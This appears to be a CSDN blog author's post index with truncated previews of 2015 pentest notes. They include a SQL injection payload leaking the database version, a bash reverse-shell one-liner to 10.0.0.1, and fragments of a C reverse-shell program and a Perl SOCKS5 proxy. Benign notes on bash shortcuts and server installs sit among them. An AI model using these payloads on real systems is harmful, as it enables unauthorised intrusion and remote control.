COMDCOMD456789-优快云博客

原创爬取页面

import urllib2import mathfor line in open('d.html'): req = urllib2.Request('http://www.wooyun.org'+line.strip()) cookie='share_firstime=1423041834739; '; req.add_header('Cookie', c...

2015-08-28 13:46:55 176

原创 limit注入

page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23

2015-07-07 21:50:53 225

原创大文件上传

压缩文件tar czvf my.tar.gz dir1 dir2分割split -b 100m(k) filename outfilenmae cat filename1,fi...>my.tar.gztar zxvf

2015-06-16 10:09:32 192

原创 zmap使用

http://www.ip2location.com/free/visitor-blockerDebian or Ubuntu: sudo apt-get install build-essential cmake libgmp3-dev libpcap-dev gengetopt byacc flexRed Hat Enterprise Linux or CentOS: sudo yu...

2015-06-16 10:08:31 817

原创 C版设置源端口反弹程序

#include <stdio.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h> void error(char *msg){ perror(msg); ...

2015-06-12 14:37:17 189

原创 perl版socks5代理

#!/usr/bin/perl $auth_enabled = 0; $auth_login = "hidden"; $auth_pass = "hidden"; $port = 44269; use IO::Socket::INET; $SIG{'CHLD'} = 'IGNORE'; $bind = IO::Socket::INET->new(Listen=>10, Reus...

2015-06-12 14:35:58 14348

原创 gbk双字节注入

<?php//连接数据库部分，注意使用了gbk编码$conn = mysql_connect('localhost', 'root', 'toor!@#$') or die('bad!');mysql_query("SET NAMES 'gbk'");mysql_select_db('test', $conn) OR emMsg("连接数据库失败，未找到您填写的数据库");...

2015-06-12 14:34:22 406

原创 mysql暴错注入

mysql的一个bug http://bugs.mysql.com/bug.php?id=8652 重现过程use mysql;create table r1 (a int); insert into r1 values (1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2),(1),(2);select left(rand(),3)...

2015-06-12 14:30:52 194

原创编译php模块

wget http://am1.php.net/distributions/php-5.3.28.tar.gztar zxvf php-5.3.28.tar.gzcd php-5.3.28cd ext./ext_skel --extname=shellcd shell vi config.m4 vi shell.c phpize...

2015-06-12 14:27:09 135

原创安装lnmp

wget -c http://soft.vpser.net/lnmp/lnmp1.0-full.tar.gz && tar zxvf lnmp1.0-full.tar.gz && cd lnmp1.0-full当然上面的soft.vpser.net也可以替换为离你近的镜像节点。下面以主镜像替换为soft2镜像为例如果是centos的系统，再执行：sed -i ...

2015-06-11 09:32:41 120

原创各种语言反弹shell

BashSome versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):bash -i >& /dev/tcp/10.0.0.1/8080 0>&1PERLHere’s a shorter, feature-free version of the perl-revers...

2015-06-11 09:30:57 339

原创 bash快捷键

Ctrl + a 切换到命令行开始Ctrl + e 切换到命令行末尾Ctrl + l 清除屏幕内容，效果等同于clearCtrl + u 清除剪切光标之前的内容Ctrl + k 剪切清除光标之后的内容Ctrl + y 粘贴刚才所删除的字符Ctrl + r 在历史命令中查找 Ctrl + c 终止命令Ctrl + d 退出shell，logoutCtrl + z ...

2015-06-11 09:27:43 154

原创修改DNS探测网站

service nscd stop#!/bin/bash a=`date +%F-%H-%M`; while read LINE; do sed -i "1s/^.*$/$LINE/" /etc/hosts;mkdir /home/webscan/logs/$a;wget www.xxx.com -O /home...

2015-06-11 09:25:11 193